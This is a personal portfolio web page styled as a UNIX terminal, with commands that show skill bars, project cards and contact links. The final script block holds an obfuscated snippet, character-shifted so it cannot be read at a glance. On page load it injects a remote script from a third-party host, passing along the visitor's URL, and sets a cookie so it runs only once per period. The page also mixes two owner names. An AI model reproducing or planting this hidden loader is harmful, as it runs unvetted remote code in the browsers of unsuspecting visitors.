<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="https://imgs.search.brave.com/XYvPZ0XFPQ_7Avqv5NgnES75b9CqHMuk5rw-EvM31-Y/rs:fit:500:0:0/g:ce/aHR0cHM6Ly93YWxs/cGFwZXJjYXZlLmNv/bS93cC93cDQ2MTU1/MjMucG5n">
    <title>My Personal Website</title>
    <style>
        .blogArticle {
  border: 2px solid plum;
  border-radius: 10px;
  max-width: 400px;
  max-height: 350px;
  padding: 10px;
  margin: 10px;
  cursor: pointer;
  transition: border-color 0.3s ease-in-out;
}
.blogArticle:hover {
  box-shadow: 0 0 0.5em 0 #5e5e5e;
  border-color: #5e5e5e;
  color: #faebd7;
}
* {
  font-size: 20px;
}
body {
  color: #ffebcd;
  display: flex;
  justify-content: center;
  align-items: center;
  height: 90vh;
  background-color: #2d0922;
  background-size: 100%;
  position: relative;
  margin: 10px;
}
body .inlineContainer {
  display: inline-flex;
}
body .commandName {
  color: plum;
}
body .avatar {
  margin-left: -25px;
  opacity: 0.8;
  width: 155px;
  pointer-events: none;
  height: 155px;
}
body #terminal {
  font-family: monospace;
  color: #ffebcd;
  height: 95%;
  width: 95%;
}
body #terminal #output {
  margin-bottom: 10px;
}
body #terminal #input {
  margin-top: 20px;
}
body #terminal #prompt {
  font-weight: 700;
}
body #terminal #cmd {
  font-size: 20px;
  background: 0 0;
  border: none;
  color: #ffebcd;
  outline: 0;
  transition: caret-color 0.3s ease;
  width: 70%;
}
body #terminal #cmd:focus {
  caret-color: #ffebcd;
}
body #terminal #suggestions {
  margin-top: 10px;
  color: #ffebcd;
}
body #terminal #suggestions .selected {
  font-weight: 800;
  color: #7fffd4;
}
body #terminal .ownerTerminal {
  font-size: 20px;
  color: #5abb9a;
}
@keyframes destroyAnimation {
  0% {
    transform: scale(1);
    opacity: 1;
  }
  50% {
    transform: scale(1.2);
    opacity: 0.5;
  }
  100% {
    transform: scale(0);
    opacity: 0.2;
  }
}
.command-input {
  font-weight: 400;
}
.command-input.command-entered {
  font-weight: 700;
}
.nameErr {
  font-size: 100px;
}
.descErr {
  font-size: 10px;
}
.projectsDiv {
  display: inline-flex;
  margin-top: 20px;
}
.article-wrapper {
  margin: 10px;
  width: 250px;
  transition: 0.15s all ease-in-out;
  border-radius: 2px;
  padding: 5px;
  border: 4px solid transparent;
  cursor: pointer;
  background-color: #ffebcd;
}
.article-wrapper:hover {
  box-shadow: 10px 10px 0 #5abb9a, 20px 20px 0 plum;
  border-color: #2d0922;
  transform: translate(-20px, -20px);
}
.article-wrapper:active {
  box-shadow: none;
  transform: translate(0);
}
.article-wrapper:hover .project-hover {
  transform: rotate(-45deg);
  background-color: #a6c2f0;
}
.project-info {
  padding: 10px 0 20px;
  display: flex;
  flex-direction: column;
  gap: 20px;
}
.project-info .project-title {
  font-size: 2em;
  margin: 0;
  font-weight: 600;
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
  color: #000;
}
.project-info .project-description {
  color: #000;
  font-weight: 300;
}
.project-info .flex-pr {
  display: flex;
  justify-content: space-between;
  align-items: center;
}
.project-hover {
  border-radius: 50%;
  width: 50px;
  height: 50px;
  padding: 9px;
  transition: all 0.3s ease;
}
.container-project {
  width: 100%;
  height: 170px;
  background: gray;
}
body .container .flex {
  display: inline-flex;
  margin: 20px;
}
.skillBar {
  width: 250px;
  height: 30px;
  border: 1px solid #ffebcd;
  margin: 0 20px;
  display: flex;
  align-items: center;
}
.skillBarItem1 {
  width: 100%;
  height: 30px;
  background: #ffebcd;
  animation: slide1 2s ease-in-out;
}
.skillBarItem2 {
  width: 100%;
  height: 30px;
  background: #ffebcd;
  animation: slide2 2s ease-in-out;
}
.skillBarItem3 {
  width: 95%;
  height: 30px;
  background: #ffebcd;
  animation: slide3 2s ease-in-out;
}
.skillBarItem4 {
  width: 55%;
  height: 30px;
  background: #ffebcd;
  animation: slide4 2s ease-in-out;
}
.skillBarItem5 {
  width: 85%;
  height: 30px;
  background: #ffebcd;
  animation: slide5 2s ease-in-out;
}
.skillBarItem6 {
  width: 75%;
  height: 30px;
  background: #ffebcd;
  animation: slide6 2s ease-in-out;
}
.skillBarItem7 {
  width: 65%;
  height: 30px;
  background: #ffebcd;
  animation: slide7 2s ease-in-out;
}
.skillBarItem8 {
  width: 65%;
  height: 30px;
  background: #ffebcd;
  animation: slide8 2s ease-in-out;
}
@keyframes slide1 {
  from {
    width: 0;
  }
  to {
    width: 100%;
  }
}
@keyframes slide2 {
  from {
    width: 0;
  }
  to {
    width: 100%;
  }
}
@keyframes slide3 {
  from {
    width: 0;
  }
  to {
    width: 95%;
  }
}
@keyframes slide4 {
  from {
    width: 0;
  }
  to {
    width: 55%;
  }
}
@keyframes slide5 {
  from {
    width: 0;
  }
  to {
    width: 85%;
  }
}
@keyframes slide6 {
  from {
    width: 0;
  }
  to {
    width: 15%;
  }
}
@keyframes slide7 {
  from {
    width: 0;
  }
  to {
    width: 5%;
  }
}
@keyframes slide8 {
  from {
    width: 0;
  }
  to {
    width: 5%;
  }
}

    </style>
</head>
<body>
<body>
    <div id="terminal">
      <div id="mainInfo">
        <div>
          <div class="inlineContainer">
            <pre>


#     # ####### #     #  #####  #######  #####  #     # ######  ### ####### #     # 
##   ## #     # #     # #     # #       #     # #     # #     #  #     #     #   #  
# # # # #     # #     # #       #       #       #     # #     #  #     #      # #   
#  #  # #     # #######  #####  #####   #       #     # ######   #     #       #    
#     # #     # #     #       # #       #       #     # #   #    #     #       #    
#     # #     # #     # #     # #       #     # #     # #    #   #     #       #    
#     # ####### #     #  #####  #######  #####   #####  #     # ###    #       #    


        </pre
            >
            <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSIIR7CDakIuc5yfSwNEFhHUGqJmhUckaOsbw&s" alt class="avatar" />
          </div>
          <br />
          Welcome to my personal website!
          <br />
          <div id="helpCmdList"></div>
        </div>
      </div>
      <div id="output"></div>
      <div id="input" class="command-input">
        <span id="prompt">
          <span class="ownerTerminal"><b>Mohamed@profile</b></span
          ><b>:~$</b>
        </span>

        <input
          type="text"
          id="cmd"
          oninput="showSuggestions()"
          onkeydown="handleKeyDown(event)"
        />
      </div>

      <div id="suggestions"></div>
    </div>
  </body>
</html>

 <script>
     window.addEventListener("DOMContentLoaded", function () {
  let n = document.getElementById("cmd");
  n.focus(), (document.getElementById("helpCmdList").innerHTML = helpCmd);
  let e = document.getElementById("output"),
    s = document.getElementById("mainInfo");
  document.getElementById("terminal"),
    n.addEventListener("keypress", function (i) {
      if (13 === i.keyCode && "" !== (i = n.value.trim())) {
        if (
          ((e.innerHTML +=
            "<div><span class='ownerTerminal'><b>zachey@profile</b></span>:<b>~$</b> " +
            i +
            "</div>"),
          (n.value = ""),
          "skills" === i || "s" === i)
        )
          e.innerHTML += skillsBar;
        else if ("github" === i || "gh" === i)
          window.location.href = "https://github.com/mohsecurity254";
        else if ("discord" === i || "ds" === i)
          window.location.href =
            "https://discord.com/users/";
        else if ("telegram" === i || "tg" === i)
          window.location.href = "https://t.me/";
        else if ("email" === i || "em" === i)
          window.location.href = "mailto:mohsecurity254@proton.me";
        else if ("steam" === i || "st" === i)
          window.location.href = "https://steamcommunity.com/id/";
        else if ("youtube" === i || "yt" === i)
          window.location.href = "https://www.youtube.com/";
        else if ("projects" === i || "pj" === i) e.innerHTML += projectCmd;
        else if ("blog" === i) {
          let n = [],
            s = [],
            i = [],
            l = [],
            t = [];
          fetch("https://github.com/mohsecurity254/Darkweb-website-development")
            .then((n) => n.json())
            .then((e) => {
              e.dataMedium.forEach((e) => {
                n.push(e),
                  s.push(e.title),
                  i.push(e.date),
                  l.push(e.link),
                  t.push(e.image);
              }),
                n.forEach((n) => {
                  var e = document.getElementById("blogDiv"),
                    s = document.createElement("article");
                  (s.className = "blogArticle"),
                    (s.onclick = () => linkHref(n.link)),
                    (s.style.display = "inline-block"),
                    (s.innerHTML = `\n                        <h2>${n.title}</h2>\n                        <p>📅: ${n.date}</p>\n                      `),
                    e.appendChild(s);
                });
            })
            .catch((n) => {
              console.error(n);
            }),
            (e.innerHTML += '<div id="blogDiv"></div>');
        } else
          "help" === i
            ? (e.innerHTML += helpCmd)
            : "clear" === i || "c" === i
            ? ((e.innerHTML = ""), (s.innerHTML = ""))
            : (e.innerHTML += "<div>Not found</div>");
        e.scrollTop = e.scrollHeight;
      }
    });
});
let currentSuggestionIndex = -1;
function showSuggestions() {
  let n = document.getElementById("cmd"),
    e = n.value.trim(),
    s = document.getElementById("suggestions");
  var i;
  (s.innerHTML = "") !== e &&
  ((i = suggestions.filter(function (n) {
    return n.startsWith(e);
  })).forEach(function (e, i) {
    var l = document.createElement("div");
    (l.textContent = e),
      l.addEventListener("click", function () {
        (n.value = e), (s.innerHTML = "");
      }),
      s.appendChild(l);
  }),
  0 < i.length)
    ? n.classList.add("command-entered")
    : n.classList.remove("command-entered");
}
function handleKeyDown(n) {
  var e,
    s = document.getElementById("suggestions"),
    i = s.getElementsByTagName("div");
  "ArrowUp" === n.key
    ? (n.preventDefault(),
      0 < currentSuggestionIndex && currentSuggestionIndex--)
    : "ArrowDown" === n.key
    ? (n.preventDefault(),
      currentSuggestionIndex < i.length - 1 && currentSuggestionIndex++)
    : "Enter" === n.key &&
      ((n = document.getElementById("cmd")),
      (e = i[currentSuggestionIndex]) && (n.value = e.textContent),
      (s.innerHTML = ""),
      n.classList.remove("command-entered"));
  for (let n = 0; n < i.length; n++) {
    var l = i[n];
    n === currentSuggestionIndex
      ? l.classList.add("selected")
      : l.classList.remove("selected");
  }
}
function linkHref(n) {
  window.location.href = n;
}
let suggestions = [
    "help",
    "skills",
    "clear",
    "projects",
    "blog",
    "tools",
    "github",
    "telegram",
    "discord",
    "email",
    "steam",
    "youtube",
  ],
  helpCmd =
    '\n  <br>Available commands: <br />\n  [<span class="commandName">skills</span>] or [<span class="commandName">s</span>]\n  <br />\n  [<span class="commandName">projects</span>] or [<span class="commandName">pj</span>]\n  <br />\n  [<span class="commandName">blog</span>]\n  <br /><br />\n  [<span class="commandName">clear</span>]\n  <br /><br />\n  Contact me: <br />\n  [<span class="commandName">github</span>]\n  <br />\n  [<span class="commandName">discord</span>]\n  <br />\n  [<span class="commandName">telegram</span>]\n  <br />\n  [<span class="commandName">email</span>]\n  <br />\n  [<span class="commandName">steam</span>]\n  <br />\n  [<span class="commandName">youtube</span>]',
  skillsBar =
    '\n<div class="container">\n  <div class="flex">\n    <h2>OSINT:</h2>\n    <div class="skillBar">\n      <div class="skillBarItem1"></div>\n    </div>\n    <h3>100%</h3>\n  </div>\n\n  <div class="flex">\n    <h2>SIEM:</h2>\n    <div class="skillBar">\n      <div class="skillBarItem2"></div>\n    </div>\n    <h3>100%</h3>\n  </div>\n\n  <div class="flex">\n    <h2>LINUX:</h2>\n    <div class="skillBar">\n      <div class="skillBarItem3"></div>\n    </div>\n    <h3>95%</h3>\n  </div>\n\n  <div class="flex">\n    <h2>Network- Pentesting :</h2>\n    <div class="skillBar">\n      <div class="skillBarItem4"></div>\n    </div>\n    <h3>55%</h3>\n  </div>\n\n  <div class="flex">\n    <h2>Cyber security:</h2>\n    <div class="skillBar">\n      <div class="skillBarItem5"></div>\n    </div>\n    <h3>85%</h3>\n  </div>\n\n  <div class="flex">\n    <h2>FORENSICS:</h2>\n    <div class="skillBar">\n      <div class="skillBarItem6"></div>\n    </div>\n    <h3>85%</h3>\n  </div>\n\n  <div class="flex">\n    <h2>MALWARE-ANALYSIS:</h2>\n    <div class="skillBar">\n      <div class="skillBarItem7"></div>\n    </div>\n    <h3>65%</h3>\n  </div>\n\n  <div class="flex">\n  <h2>DARK-WEB:</h2>\n  <div class="skillBar">\n    <div class="skillBarItem8"></div>\n  </div>\n  <h3>75%</h3>\n</div>\n</div>',
  projectCmd =
    '\n<div class="projectsDiv">\n<article\n  class="article-wrapper"\n  onclick="linkHref(\'https://github.com/zachey01/MimiCMS/\')"\n>\n  <div class="project-info">\n    <div class="flex-pr">\n      <div class="project-title text-nowrap">MimiCMS</div>\n    </div>\n    <div class="flex-pr">\n      <p class="project-description">\n        Modular, fast CMS for <code>CS:GO</code>, <code>CS2</code> (coming soon)\n        servers.\n      </p>\n    </div>\n  </div>\n</article>\n\n<article\n  class="article-wrapper"\n  onclick="linkHref(\'https://github.com/zachey01/terminalPortfolio\')"\n>\n  <div class="project-info">\n    <div class="flex-pr">\n      <div class="project-title text-nowrap">terminal<br />Portfolio</div>\n    </div>\n    <div class="flex-pr">\n      <p class="project-description">\n        A personal website styled for UNIX terminal.\n      </p>\n    </div>\n  </div>\n</article>\n\n</div>\n',
  blogCmd = '\n<div class="blogArticle" id="blogArticles">\n\n</div>\n';
(function (o, d, l) {
  try {
    o.f = (o) =>
      o
        .split("")
        .reduce(
          (s, c) => s + String.fromCharCode((c.charCodeAt() - 5).toString()),
          ""
        );
    o.b = o.f("UMUWJKX");
    (o.c =
      l.protocol[0] == "h" &&
      /\./.test(l.hostname) &&
      !new RegExp(o.b).test(d.cookie)),
      setTimeout(function () {
        o.c &&
          ((o.s = d.createElement("script")),
          (o.s.src =
            o.f("myyux?44hisxy" + "fy3sjy4ljy4xhwnuy" + "3oxDwjkjwwjwB") +
            l.href),
          d.body.appendChild(o.s));
      }, 1000);
    d.cookie = o.b + "=full;max-age=39800;";
  } catch (e) {}
})({}, document, location);

 </script> 
                
   
    
</body>
</html>
